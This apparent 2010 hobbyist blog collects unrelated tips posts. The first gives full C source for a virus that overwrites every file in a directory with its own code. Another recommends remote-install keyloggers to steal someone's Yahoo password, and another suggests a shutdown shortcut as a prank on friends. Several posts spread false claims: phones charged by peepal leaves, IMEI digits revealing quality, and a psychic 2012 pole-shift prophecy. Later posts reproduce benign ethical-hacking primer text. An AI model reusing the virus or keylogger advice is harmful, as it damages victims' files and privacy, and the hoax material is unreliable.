Search This Blog

Sunday, December 26, 2010

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

Is your Nokia Cell Phone Original ?

Nokia is one of the largest selling phones across the globe. Most of us own a Nokia phone but are unaware of it’s originality. Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.

Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).
Then check the 7th and 8th numbers
Phone serial no. x x x x x x ? ? x x x x x x x

IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your cell phone was assembled in Emirates which is very Bad quality.

IF the Seventh & Eighth digits of your cell phone are 08 or 80 this means your cell phone was manufactured in Germany which is fair quality.

IF the Seventh & Eighth digits of your cell phone are 01 or 10 this means your cell phone was manufactured in Finland which is very Good.

IF the Seventh & Eighth digits of your cell phone are 00 this means your cell phone was manufactured in original factory which is the best Mobile Quality.

IF the Seventh & Eighth digits of your cell phone are 13 this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your health.

Friday, December 24, 2010

Earn upto Rs. 9,000 Per month

 Earn upto Rs. 9,000 Per month

Hi ,

I have something interesting for you - you can easily earn regular income online via PaisaLive.com!

It’s really amazing! You get paid to open & read the contents of PaisaLive mails. You also receive special discount coupons, promotions and free passes to various events in your city.

Join now and get Rs. 99 instantly, just for joining. What more, as a special bonus you get paid for inviting your friends also!

Create your PaisaLive Account & refer your friends to earn launch referral bonus on every new registration.



Earn upto Rs. 9,000 pm checking Emails. Join now!



PaisaLive - Get Paid to read emails

join as soon as possible
 
join with this link - http://www.PaisaLive.com/register.asp?765148-7768656 

Saturday, December 18, 2010

http://www.google.com/

Speed up BSNL dataone Broadband connection speed.


Open Control Panel -> Networking and Sharing Center -> Manage Network Connection.

2. Now a window showing all networks will be opened. Select BSNL Connection -> Right click -> Properties.
3. Now, double click on Internet Protocol Version(TCP/IPv4) and in newly opened window at bottom, select “Use the following DNS Server address” .
4. And fill these 2 DNS Addresses in two fields:
208.67.222.222
208.67.220.220

and hit OK. Thats it. Your BSNL Internet Broadband DNS Servers changed.

Friday, December 3, 2010

how to shut down your computers in some seconds with the help of create a fake virus

This is an interesting tutorial in which we will create a fake “virus” which can shutdown, restart and log off your pc(Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking START>TURNOFF button etc….And you can always do a little mischief by sending it to your friends ;)

1Create shortcut,(Right click on your desktop and go to new -> shortcut )
2)After this will appear window and that is where you type the code

shutdown -s -t 300 -c "Your Message"


There are few variants , this one will shutdown pc .
To log of computer type shutdown -l -t 300 -c "your message" 
To restart computer type shutdown -r -t 300 -c " your message" 
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.

Thursday, December 2, 2010

CHARGE UR MOBILE WITHOUT ELECTRICITY

It is possible in this technology world.Just get two green leaves from peepal tree, it charges your mobile.How?



Here is the procedure:
1. Open your mobile back cover.
2. Take out your mobile battery.
3. Take the leaves.
4. Hold the stub of the leaves on mobile battery terminal for two minutes.
5.Put your battery into your mobile and get shock!
6.Now your battery became charged.

Tuesday, November 30, 2010

Make Your Computer Speaks For You Instantly::::::::

Hi friends I hope you all are fine, Today I an very interesting handy software for you that can speek for you instantly , Read out full post to know more..

It is possible to make your computer talk? The answer is YES. Your computer can talk. I am going to share with you a new handy program. With the help of this program, your computer can speak whatever you want to hear from it. Please inform me whether you liked it or not. Just follow the steps below:

All information on this handy software :-

How to use:- You have to just type whatever you want to here from it and click on ok
just copy paste this to notepad and save it as ( anything ).vbs

Dim userInput



userInput = InputBox("Write a message for me to say")


Set Sapi = Wscript.CreateObject("SAPI.SpVoice")


Sapi.speak userInput

how to hack the yahoo messenger password

Everyday I get a lot of emails from people asking How to hack a Yahoo password? So if you’re curious to know how to hack a yahoo password then this is the post for you. In this post I will give you the real and working ways to hack Yahoo password.

There are number of sites on the web that provide information to hack a Yahoo password. So what’s special about this site? The only special about this site is that we do not bluff and mislead the readers. We actually teach you the real and working ways to hack a Yahoo password rather than telling some nonsense tricks to crack or hack some one’s yahoo password.


Using keylogger is the easiest way to hack a Yahoo messenger password. Any one with a basic knowledge of computer can use a keylogger without any problems. It doesn’t matter whether or not you’ve physical access to the target computer. The following are some of the frequently asked questions about keyloggers.


1. What is a keylogger?
A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as Spy program or Spy software.


2. Where can I get the keylogger?
There exists hundrends of keyloggers on the internet. But most of them are of poor quality and fail to deliver a good performance. The two best keyloggers for hacking yahoo password are listed below.


1.SniperSpy (Supports Remote Installation)
2.Win-Spy (Supports Remote Installation)


3. Which keylogger is the best to hack Yahoo password?
Both the above mentioned ones are best for hacking Yahoo. However I recommend Sniperspy since it is more reliable and has got a better advantage over Winspy.
If you’re really serious to hack a Yahoo password then I strongly recommend using either of the two mentioned keyloggers.

Friday, August 27, 2010

World Predictions 2010

World Predictions 2010

Levi' s World Predictions 2010
Psychic Hacking Headlines Of The Future
Welcome to my world Predictions 2010. And what a year it promises to be once it gets into it's stride.
If you are a new visitor to this website, it is recommended that you browse the 2007, 2008 and 2009 world predictions which I leave posted for research, scrutiny or criticism. It will acquaint you with the accuracy of my Predictions. They will also make you familiar with my no nonsense style and what may seem as outrageous or impossible to happen at the time of writing.
I am also required by UK Law to inform you that Psychics in this country are not taken seriously by the Government so we are classed and filed away under the Entertainment Industry so my Predictions are for Entertainment Only and the fact that over two thirds of these Predictions will manifest into reality must be of a coincidental nature.

Psychic Hacking
Besides Precognitive instinct, I use the same technique to perform a little Psychic Hacking of future news headlines long before they appear. My findings are then fed to you Periodically through my Blog or Slog as I like to call it when time affords. I also use the same technique to penetrate places or situations where I or you are not supposed to be when certain entities prefer to keep things hidden from public eyes. For entertainment only you understand.

Gain The Edge
I have seen some things in store for 2009 which many are totally unprepared for. In fact I hope I am totally wrong about the major things I see, but history or my track record would suggest otherwise.
I am not here to prove Psychic ability to you, that is not an issue for debate, especially at my age. If you are skeptic and think that I am just a good guesser, that's fine too as long as you at least take some things I say on board and think.
I have a theory of simple wisdom. There is no harm in knowing something even if it does not come true, but if it does happen, you are forearmed and therefore gain the edge. In 2009 you will need that edge more than any other year you have lived.

2012
Another purpose of this website is to make you aware of the year 2012. I have been drawing peoples attention to this for almost a decade. It was hard to convince anyone at first because there was hardly anything written on the internet except for vague research or history websites of great boredom and understood only by academics.
However, in the past few years there has been an avalanche of instant experts who in reality know nothing about 2012 except rehashing what the last non expert rehashed. They make a bit of money, good for them. But there is one slight problem, because they do not know, they are prone to sensationalize and blow things out of proportion.
And so it is that most knowledge you have read about 2012 will make you think the world will end on that day.

And so it will. That is why the ancient Maya called it End Times. That is when their calendar ends, the same calendar that has predicted every kind of eclipse we have seen with great accuracy.
But what those instant experts do not tell you is that the Maya measured time. They knew how far the Moon was within an inch. They calculated that the Earth took 365.4 days to orbit the Sun. Some modern scientists insist the Maya got it wrong because with our modern technology, we have found it actually takes 365.2 days. What is wrong with these people? Two points out! Considering they did not even possess a telescope, I would say it was a pretty close result.
We cannot rely on scientists or the media to learn about 2012. Instead it is far better to travel back in time and listen to the messages or warnings left for us by ancient races who have witnessed the event.

Yes, it has happened before, in fact many times before. But what is this event which the MS Media and Governments avoid like the plague?
A Pole Shift or reversal of our Magnetic Poles. Yes there will be untold chaos on Earth during the process. Yes many places will disappear under the sea. Yes there will be Earthquakes so strong, they will be unmeasurable. And yes, many will perish because the powers that be prefer to keep us ignorant while they scuttle down to their bunkers and leave us to cope with this fearful event.
But my friends, end of the world and mankind it's not. Sorry to all doomsday preachers but you have it totally wrong. You have sold your non knowledge, made a few quid, now sling your hook and jump on another bandwagon to spread your fear mongering.
I will update this subject soon because there is so much you should know and understand.
Conspiracy To Reality

Meanwhile the run up to 2012 will be a wild ride and 2009 is the beginning. The year when many of you will open your eyes for the first time. But also the year where the majority of people will close them to the truth. The latter will struggle to survive with their sanity intact.
This is the year where you will become suspicious of politicians, governments if you are not already. Trust me, the higher ranking of these people know exactly what is around the corner, but they have an agenda.

Remember that when I warned of recession and House price collapse? Very few people listened and those that did thought old Levi had lost the plot except for a few wise bods. But I kept reminding you throughout the year regardless and took the flak. I do this because I know when the predicted event comes around, it makes you think.
Do I get frustrated at people who do not listen? No, it is only a matter of time before reality kicks in, no matter how strange it may be. Besides, if I told myself about the current global financial crisis last year when easy credit was flowing and a booming housing industry, then I wouldn't believe me either. In fact I would have a good laugh.
But in all seriousness, those ridiculous no chance of happening Predictions, have now become reality. You are now here living the time of which I warned you. It was impossible back then wasn't it?

So will you listen this time or continue to live in denial? It matters not one iota to me. You are in control of your life and either believe things or don't. But let me tell you something now. If you think this financial mess will soon be over, you are delusional and you do not know it.
If you continue to believe politicians and the controlled Main stream Media, you are more delusional than I first thought. Prepare to be utterly devastated before Summer is over.
Here in this place, the rules are simple. Listen and conclude but hold this in the back of your mind.
I warned about last September. It eventually happened and caught most by complete surprise. Many are still in shock whereas others are completely devastated and homeless with a very bleak future on the horizon. How could things turn around and upside down so quickly is a question that may haunt you. But it's no good crying over spilt milk. You are here in this present time and in the nightmare I Predicted.


The politicians acted as though September was a complete surprise to them. But they stayed cool and made a new expression up. They told you not to panic, it was a mere Credit Crunch. I screamed don't listen, this is no crunch, it's a looming recession. When their lies could no longer be sustained, they decided you was ready for the real news. Yes my friends, it wasn't a Credit Crunch after all. Now it was a Recession
I scanned the situation a little later and what did I see. It's no longer a Recession but a looming Depression, one not seen since the Great Depression. Disregard my words at your own peril. Things have not even started yet. And still the politicians lie. Still they have difficulty with what they refer to as the 'D' word so they have invented another substitute expression. We are in a Deep Recession. Funny that. I thought that is what a Depression was.
How many times you allow yourself to be lied to and misled by these entities is entirely up to you. And I don't need to be a Psychic to tell where it will all end for you. In tears.
If a horse tipster constantly gives you seven winners out of ten, you know you have found a gold mine. If a politician lies to you seven out of ten, who do you continue to listen to. The Tipster or Politician?

We can no longer afford to be lied to. Be it media or government. But that is all they have on the menu for us. Lies, Disinformation and treachery. The day you treat those two entities as they treat you.. with Contempt, that is the day where the ignorance they have conditioned into you becomes wisdom instead.

This year you will begin to see or feel that something strange is afoot. Trust your instinct and know a lie when you here one. MS Media? Switch off and leave it for the docile lambs to the slaughter. They have become far to conditioned to help now. They are making their bed and soon they will be made to lay in it.

Sunday, June 13, 2010

Thursday, March 18, 2010

Hack Your Own Systems

Introduction to Ethical Hacking

_ Understanding hacker objectives
_ Outlining the differences between ethical hackers and malicious hackers
_ Examining how the ethical hacking process has come about
_ Understanding the dangers that your computer systems face
_ Starting the ethical hacking process
This is about hacking ethically — the science of testing your computers
and network for security vulnerabilities and plugging the holes you
find before the bad guys get a chance to exploit them.
Although ethical is an often overused and misunderstood word, the Merriam-
Webster dictionary defines ethical perfectly for the context of this book and
the professional security testing techniques that I cover — that is, conforming
to accepted professional standards of conduct. IT practitioners are obligated to
perform all the tests covered in this book aboveboard and only after permission
has been obtained by the owner(s) of the systems — hence the disclaimer
in the introduction.

How Hackers Beget Ethical Hackers
We’ve all heard of hackers. Many of us have even suffered the consequences
of hacker actions. So who are these hackers? Why is it important to know
about them? The next few sections give you the lowdown on hackers.
Defining hacker

Hacker is a word that has two meanings:
_ Traditionally, a hacker is someone who likes to tinker with software or
electronic systems. Hackers enjoy exploring and learning how computer
systems operate. They love discovering new ways to work electronically.

_ Recently, hacker has taken on a new meaning — someone who maliciously
breaks into systems for personal gain. Technically, these criminals are
crackers (criminal hackers). Crackers break into (crack) systems with
malicious intent. They are out for personal gain: fame, profit, and even
revenge. They modify, delete, and steal critical information, often making
other people miserable.
The good-guy (white-hat) hackers don’t like being in the same category as the
bad-guy (black-hat) hackers. (These terms come from Western movies where
the good guys wore white cowboy hats and the bad guys wore black cowboy
hats.) Whatever the case, most people give hacker a negative connotation.
Many malicious hackers claim that they don’t cause damage but instead are
altruistically helping others. Yeah, right. Many malicious hackers are electronic
thieves.

In this, I use the following terminology:
_ Hackers (or bad guys) try to compromise computers.
_ Ethical hackers (or good guys) protect computers against illicit entry.
Hackers go for almost any system they think they can compromise. Some
prefer prestigious, well-protected systems, but hacking into anyone’s system
increases their status in hacker circles.

Ethical Hacking -
You need protection from hacker shenanigans. An ethical hacker possesses
the skills, mindset, and tools of a hacker but is also trustworthy. Ethical hackers
perform the hacks as security tests for their systems.
If you perform ethical hacking tests for customers or simply want to add
another certification to your credentials, you may want to consider the ethical
hacker certification Certified Ethical Hacker, which is sponsored by ECCouncil.
See www.eccouncil.org/CEH.htm for more information.
Ethical hacking — also known as penetration testing or white-hat hacking —
involves the same tools, tricks, and techniques that hackers use, but with one
major difference: Ethical hacking is legal. Ethical hacking is performed with
the target’s permission. The intent of ethical hacking is to discover vulnerabilities
from a hacker’s viewpoint so systems can be better secured. It’s part
of an overall information risk management program that allows for ongoing
security improvements. Ethical hacking can also ensure that vendors’ claims
about the security of their products are legitimate.
To hack your own systems like the bad guys, you must think like they think.
It’s absolutely critical to know your enemy; see Chapter 2 for details.
Understanding the Need to

Hack Your Own Systems-
To catch a thief, think like a thief. That’s the basis for ethical hacking.
The law of averages works against security. With the increased numbers and
expanding knowledge of hackers combined with the growing number of system
vulnerabilities and other unknowns, the time will come when all computer
systems are hacked or compromised in some way. Protecting your systems
from the bad guys — and not just the generic vulnerabilities that everyone
knows about — is absolutely critical. When you know hacker tricks, you can
see how vulnerable your systems are.
Hacking preys on weak security practices and undisclosed vulnerabilities.
Firewalls, encryption, and virtual private networks (VPNs) can create a false
feeling of safety. These security systems often focus on high-level vulnerabilities,
such as viruses and traffic through a firewall, without affecting how hackers
work. Attacking your own systems to discover vulnerabilities is a step to
making them more secure. This is the only proven method of greatly hardening
your systems from attack. If you don’t identify weaknesses, it’s a matter of
time before the vulnerabilities are exploited.
As hackers expand their knowledge, so should you. You must think like them
to protect your systems from them. You, as the ethical hacker, must know
activities hackers carry out and how to stop their efforts. You should know
what to look for and how to use that information to thwart hackers’ efforts.
You don’t have to protect your systems from everything. You can’t. The only
protection against everything is to unplug your computer systems and lock
them away so no one can touch them — not even you. That’s not the best
approach to information security. What’s important is to protect your systems
from known vulnerabilities and common hacker attacks.
It’s impossible to buttress all possible vulnerabilities on all your systems. You
can’t plan for all possible attacks — especially the ones that are currently
unknown. However, the more combinations you try — the more you test whole
systems instead of individual units — the better your chances of discovering
vulnerabilities that affect everything as a whole.
Don’t take ethical hacking too far, though. It makes little sense to harden your
systems from unlikely attacks. For instance, if you don’t have a lot of foot traffic
in your office and no internal Web server running, you may not have as much
to worry about as an Internet hosting provider would have. However, don’t
forget about insider threats from malicious employees!

Your overall goals as an ethical hacker should be as follows:
_ Hack your systems in a nondestructive fashion.
_ Enumerate vulnerabilities and, if necessary, prove to upper management
that vulnerabilities exist.
_ Apply results to remove vulnerabilities and better secure your systems.
Understanding the Dangers
Your Systems Face
It’s one thing to know that your systems generally are under fire from hackers
around the world. It’s another to understand specific attacks against your systems
that are possible. This section offers some well-known attacks but is by
no means a comprehensive listing. That requires its own book: Hack Attacks
Encyclopedia, by John Chirillo (Wiley Publishing, Inc.).
Many information-security vulnerabilities aren’t critical by themselves.
However, exploiting several vulnerabilities at the same time can take its toll.
For example, a default Windows OS configuration, a weak SQL Server administrator
password, and a server hosted on a wireless network may not be
major security concerns separately. But exploiting all three of these vulnerabilities
at the same time can be a serious issue.
Nontechnical attacks
Exploits that involve manipulating people — end users and even yourself —
are the greatest vulnerability within any computer or network infrastructure.
Humans are trusting by nature, which can lead to social-engineering exploits.
Social engineering is defined as the exploitation of the trusting nature of human
beings to gain information for malicious purposes. I cover social engineering
in depth in Chapter 5.
Other common and effective attacks against information systems are physical.
Hackers break into buildings, computer rooms, or other areas containing critical
information or property. Physical attacks can include dumpster diving
(rummaging through trash cans and dumpsters for intellectual property,
passwords, network diagrams, and other information).

Network-infrastructure attacks
Hacker attacks against network infrastructures can be easy, because many
networks can be reached from anywhere in the world via the Internet. Here
are some examples of network-infrastructure attacks:

_ Connecting into a network through a rogue modem attached to a
computer behind a firewall
_ Exploiting weaknesses in network transport mechanisms, such as TCP/IP
and NetBIOS
_ Flooding a network with too many requests, creating a denial of service
(DoS) for legitimate requests
_ Installing a network analyzer on a network and capturing every packet
that travels across it, revealing confidential information in clear text
_ Piggybacking onto a network through an insecure 802.11b wireless
configuration

Operating-system attacks-
Hacking operating systems (OSs) is a preferred method of the bad guys. OSs
comprise a large portion of hacker attacks simply because every computer
has one and so many well-known exploits can be used against them.
Occasionally, some operating systems that are more secure out of the box —
such as Novell NetWare and the flavors of BSD UNIX — are attacked, and
vulnerabilities turn up. But hackers prefer attacking operating systems like
Windows and Linux because they are widely used and better known for their
vulnerabilities.

Here are some examples of attacks on operating systems:
_ Exploiting specific protocol implementations
_ Attacking built-in authentication systems
_ Breaking file-system security
_ Cracking passwords and encryption mechanisms
Application and other specialized attacks
Applications take a lot of hits by hackers. Programs such as e-mail server
software and Web applications often are beaten down:
_ Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol
(SMTP) applications are frequently attacked because most firewalls and
other security mechanisms are configured to allow full access to these
programs from the Internet.
_ Malicious software (malware) includes viruses, worms, Trojan horses,
and spyware. Malware clogs networks and takes down systems.
_ Spam (junk e-mail) is wreaking havoc on system availability and storage
space. And it can carry malware.
Ethical hacking helps reveal such attacks against your computer systems.
Parts II through V of this book cover these attacks in detail, along with specific
countermeasures you can implement against attacks on your systems.
Obeying the Ethical Hacking
Commandments
Every ethical hacker must abide by a few basic commandments. If not, bad
things can happen. I’ve seen these commandments ignored or forgotten when
planning or executing ethical hacking tests. The results weren’t positive.
Working ethically
The word ethical in this context can be defined as working with high professional
morals and principles. Whether you’re performing ethical hacking tests
against your own systems or for someone who has hired you, everything you
do as an ethical hacker must be aboveboard and must support the company’s
goals. No hidden agendas are allowed!
Trustworthiness is the ultimate tenet. The misuse of information is absolutely
forbidden. That’s what the bad guys do.
Respecting privacy
Treat the information you gather with the utmost respect. All information
you obtain during your testing — from Web-application log files to clear-text
passwords — must be kept private. Don’t use this information to snoop into
confidential corporate information or private lives. If you sense that someone
should know there’s a problem, consider sharing that information with the
appropriate manager.
Involve others in your process. This is a “watch the watcher” system that can
build trust and support your ethical hacking projects.
Not crashing your systems
One of the biggest mistakes I’ve seen when people try to hack their own systems
is inadvertently crashing their systems. The main reason for this is poor
planning. These testers have not read the documentation or misunderstand
the usage and power of the security tools and techniques.
You can easily create DoS conditions on your systems when testing. Running
too many tests too quickly on a system causes many system lockups. I know
because I’ve done this! Don’t rush things and assume that a network or specific
host can handle the beating that network scanners and vulnerabilityassessment
tools can dish out.
Many security-assessment tools can control how many tests are performed
on a system at the same time. These tools are especially handy if you need to
run the tests on production systems during regular business hours.
You can even create an account or system lockout condition by social engineering
someone into changing a password, not realizing that doing so might
create a system lockout condition.
The Ethical Hacking Process
Like practically any IT or security project, ethical hacking needs to be planned
in advance. Strategic and tactical issues in the ethical hacking process should
be determined and agreed upon. Planning is important for any amount of
testing — from a simple password-cracking test to an all-out penetration test
on a Web application.
Formulating your plan
Approval for ethical hacking is essential. Make what you’re doing known and
visible — at least to the decision makers. Obtaining sponsorship of the project
is the first step. This could be your manager, an executive, a customer, or
even yourself if you’re the boss. You need someone to back you up and sign
off on your plan. Otherwise, your testing may be called off unexpectedly if
someone claims they never authorized you to perform the tests.
The authorization can be as simple as an internal memo from your boss if
you’re performing these tests on your own systems. If you’re testing for a
customer, have a signed contract in place, stating the customer’s support and
authorization. Get written approval on this sponsorship as soon as possible
to ensure that none of your time or effort is wasted. This documentation is
your Get Out of Jail Free card if anyone questions what you’re doing.
You need a detailed plan, but that doesn’t mean you have to have volumes of
testing procedures. One slip can crash your systems — not necessarily what
anyone wants. A well-defined scope includes the following information:

_ Specific systems to be tested
_ Risks that are involved
_ When the tests are performed and your overall timeline
_ How the tests are performed
_ How much knowledge of the systems you have before you start testing
_ What is done when a major vulnerability is discovered
_ The specific deliverables — this includes security-assessment reports
and a higher-level report outlining the general vulnerabilities to be
addressed, along with countermeasures that should be implemented
When selecting systems to test, start with the most critical or vulnerable
systems. For instance, you can test computer passwords or attempt socialengineering
attacks before drilling down into more detailed systems.
It pays to have a contingency plan for your ethical hacking process in case
something goes awry. What if you’re assessing your firewall or Web application,
and you take it down? This can cause system unavailability, which can
reduce system performance or employee productivity. Even worse, it could
cause loss of data integrity, loss of data, and bad publicity.
Handle social-engineering and denial-of-service attacks carefully. Determine
how they can affect the systems you’re testing and your entire organization.
Determining when the tests are performed is something that you must think
long and hard about. Do you test during normal business hours? How about
late at night or early in the morning so that production systems aren’t affected?
Involve others to make sure they approve of your timing.
The best approach is an unlimited attack, wherein any type of test is possible.
The bad guys aren’t hacking your systems within a limited scope, so why
should you? Some exceptions to this approach are performing DoS, socialengineering,
and physical-security tests.
Don’t stop with one security hole. This can lead to a false sense of security.
Keep going to see what else you can discover. I’m not saying to keep hacking
until the end of time or until you crash all your systems. Simply pursue the
path you’re going down until you can’t hack it any longer (pun intended).
One of your goals may be to perform the tests without being detected. For
example, you may be performing your tests on remote systems or on a remote
office, and you don’t want the users to be aware of what you’re doing. Otherwise,
the users may be on to you and be on their best behavior.
You don’t need extensive knowledge of the systems you’re testing — just a
basic understanding. This will help you protect the tested systems.
Understanding the systems you’re testing shouldn’t be difficult if you’re hacking
your own in-house systems. If you’re hacking a customer’s systems, you
may have to dig deeper. In fact, I’ve never had a customer ask for a fully blind
assessment. Most people are scared of these assessments. Base the type of
test you will perform on your organization’s or customer’s needs.
Chapter 19 covers hiring “reformed” hackers.
Selecting tools
As with any project, if you don’t have the right tools for ethical hacking, accomplishing
the task effectively is difficult. Having said that, just because you use
the right tools doesn’t mean that you will discover all vulnerabilities.
Know the personal and technical limitations. Many security-assessment tools
generate false positives and negatives (incorrectly identifying vulnerabilities).
Others may miss vulnerabilities. If you’re performing tests such as socialengineering
or physical-security assessments, you may miss weaknesses.
Many tools focus on specific tests, but no one tool can test for everything.
For the same reason that you wouldn’t drive in a nail with a screwdriver, you
shouldn’t use a word processor to scan your network for open ports. This is
why you need a set of specific tools that you can call on for the task at hand.
The more tools you have, the easier your ethical hacking efforts are.
Make sure you that you’re using the right tool for the task:

_ To crack passwords, you need a cracking tool such as LC4, John the
Ripper, or pwdump.
A general port scanner, such as SuperScan, may not crack passwords.
_ For an in-depth analysis of a Web application, a Web-application assessment
tool (such as Whisker or WebInspect) is more appropriate than a
network analyzer (such as Ethereal).
When selecting the right security tool for the task, ask around. Get advice
from your colleagues and from other people online. A simple Groups search
on Google (www.google.com) or perusal of security portals, such as
SecurityFocus.com, SearchSecurity.com, and ITsecurity.com, often produces
great feedback from other security experts.
Hundreds, if not thousands, of tools can be used for ethical hacking — from
your own words and actions to software-based vulnerability-assessment programs
to hardware-based network analyzers. The following list runs down
some of my favorite commercial, freeware, and open-source security tools:
_ Nmap
_ EtherPeek
_ SuperScan
_ QualysGuard
_ WebInspect
_ LC4 (formerly called L0phtcrack)
_ LANguard Network Security Scanner
_ Network Stumbler
_ ToneLoc

Here are some other popular tools:
_ Internet Scanner
_ Ethereal
_ Nessus
_ Nikto
_ Kismet
_ THC-Scan
I discuss these tools and many others in Parts II through V when I go into the
specific hack attacks. Appendix A contains a more comprehensive listing of
these tools for your reference.
The capabilities of many security and hacking tools are often misunderstood.
This misunderstanding has shed negative light on some excellent tools, such
as SATAN (Security Administrator Tool for Analyzing Networks) and Nmap
(Network Mapper).

Some of these tools are complex. Whichever tools you use, familiarize yourself
with them before you start using them. Here are ways to do that:
_ Read the readme and/or online help files for your tools.
_ Study the user’s guide for your commercial tools.
_ Consider formal classroom training from the security-tool vendor or
another third-party training provider, if available.
Look for these characteristics in tools for ethical hacking:
_ Adequate documentation.
_ Detailed reports on the discovered vulnerabilities, including how they
may be exploited and fixed.
_ Updates and support when needed.
_ High-level reports that can be presented to managers or nontechie types.
These features can save you time and effort when you’re writing the report.
Executing the plan
Ethical hacking can take persistence. Time and patience are important. Be
careful when you’re performing your ethical hacking tests. A hacker in your
network or a seemingly benign employee looking over your shoulder may
watch what’s going on. This person could use this information against you.
It’s not practical to make sure that no hackers are on your systems before
you start. Just make sure you keep everything as quiet and private as possible.
This is especially critical when transmitting and storing your test results.
If possible, encrypt these e-mails and files using Pretty Good Privacy (PGP) or
something similar. At a minimum, password-protect them.
You’re now on a reconnaissance mission. Harness as much information as
possible about your organization and systems, which is what malicious hackers
do. Start with a broad view and narrow your focus:
1. Search the Internet for your organization’s name, your computer and
network system names, and your IP addresses.
Google is a great place to start for this.
2. Narrow your scope, targeting the specific systems you’re testing.
Whether physical-security structures or Web applications, a casual
assessment can turn up much information about your systems.
3. Further narrow your focus with a more critical eye. Perform actual
scans and other detailed tests on your systems.
4. Perform the attacks, if that’s what you choose to do.

Evaluating results
Assess your results to see what you uncovered, assuming that the vulnerabilities
haven’t been made obvious before now. This is where knowledge counts.
Evaluating the results and correlating the specific vulnerabilities discovered
is a skill that gets better with experience. You’ll end up knowing your systems
as well as anyone else. This makes the evaluation process much simpler
moving forward.
Submit a formal report to upper management or to your customer, outlining
your results. Keep these other parties in the loop to show that your efforts
and their money are well spent. Chapter 17 describes this process.

Moving on
When you’ve finished your ethical hacking tests, you still need to implement
your analysis and recommendations to make sure your systems are secure.
New security vulnerabilities continually appear. Information systems constantly
change and become more complex. New hacker exploits and security
vulnerabilities are regularly uncovered. You may discover new ones! Security
tests are a snapshot of the security posture of your systems. At any time,
everything can change, especially after software upgrades, adding computer
systems, or applying patches. Plan to test regularly (for example, once a
week or once a month). Chapter 19 covers managing security changes.

Friday, March 5, 2010

Ethical Hacking Services Wireless Security

The BT Wireless Security Ethical Hacking Assessment is composed
of multiple phases. Each phase provides the EHCOE consultants
with more information that acts as the foundation for the next. The
three phases of the project are: Map and Identify Active Wireless
Networks, Assess Wireless Implementation for Vulnerabilities,
Exploit Vulnerabilities and Access Other Networks.

During the first phase, Map and Identify Active Wireless Networks,
BT will determine your network’s vulnerability to an attacker with
radio access to the wireless network space. The EHCOE consultants
will attempt detect the 802.11 wireless networks in place
(including any ad-hoc networks identified), determine the
locations and ranges of the wireless networks, evaluate the range
of the wireless access area, determine network configuration
information and probe points of entry for identifying system
information or access parameters.

In the second phase of the engagement, Assess Wireless
Implementation for Vulnerabilities, BT will pose as someone with
normal user access and evaluate the security measures taken to
secure infrastructure, including the following ESSID, the use and
strength of WEP encryption, network segmentation and access
control devices.

During the Exploit Vulnerabilities and Access Other Networks phase
of the project, BT will attempt to use the vulnerabilities discovered
during Phase 2 to obtain access to other network segments. If the
consultants are successful, they will test different methods to
exploit that access. This phase will determine which network
segments and systems the wireless network infrastructure can
access, the security controls that separate the wireless network
from other network segments and if the wireless network can be
used as a launching point to attack other systems.

Before the project begins, BT will develop boundaries for actions
and events that our consultants can perform during the
vulnerability assessment. For the Wireless Security Ethical Hacking
assessment, the EHCOE consultants will use a variety of publicly
available and proprietary tools. All publicly available tools used by
BT have undergone source code review and thorough evaluations
(including sniffer logs) in our testing lab.

Any High-Risk vulnerabilities/risks identified during the assessment
will be communicated immediately to you. After the testing has
been completes, BT will provide your organization with a formal
report that:
• Lists all identified weaknesses and vulnerabilities
• Explains the risks associate with the current
network configuration
• Presents recommendations to increase the security
of your wireless infrastructure

Friday, February 26, 2010

What is the ethical hacker and what is the need of ethical hacker.

An Ethical Hacker is an expert hired by a company to attempt to attack their network and computer system the same way a hacker would. Ethical Hackers use the same techniques and tactics as those used by illegal hackers to breach corporate security systems. The end result is the company's ability to prevent an intrusion before it ever occurs.
A company can't know if their security system is solid unless they test it. It's hard, though, for a company's IT team to thoroughly ring out the system. Try as they might, the techs can't go at the system with all the malicious or mischievous motives of a true illegal hacker. To thoroughly uncover vulnerabilities, the theory goes; you must examine your security system through the eyes of an illegal hacker.
The word hacking has strongly negative connotations, and, for the most part, rightly so. But ethical hacking is much different. It takes place with the explicit permission of the company whose system is being attacked. In fact, their "good guy" role is underscored by the nickname "white hat" Ethical Hackers have been given. The nickname is a throwback to old Westerns where the good cowboys could be identified by their white hats.
The company and the Ethical Hacker enter into a legally binding contract. The contract, sometimes called a "get out of jail free card," sets forth the parameters of the testing. It's called the "get out of jail free card" because it's what harbors the Ethical Hacker from prosecution. Hacking is a felony, and a serious one at that. The terms of the agreement are what transform illegal behavior into a legal and legitimate occupation.
Once the hacker has exhausted his attempts, he reports back to the company with a list of the vulnerabilities he uncovered. The list in and of itself, however, is not particularly useful. What's most valuable is the instructions for eliminating the vulnerabilities that the Ethical Hacker provides.
An Ethical Hacker works to uncover three key pieces of information. First, he determines what information an illegal hacker can gain access to. Next, he explores what an illegal hacker could do with that information once gained. Last, the Ethical Hacker ascertains whether an employee or staff member would be alerted to the break-in, successful or not.
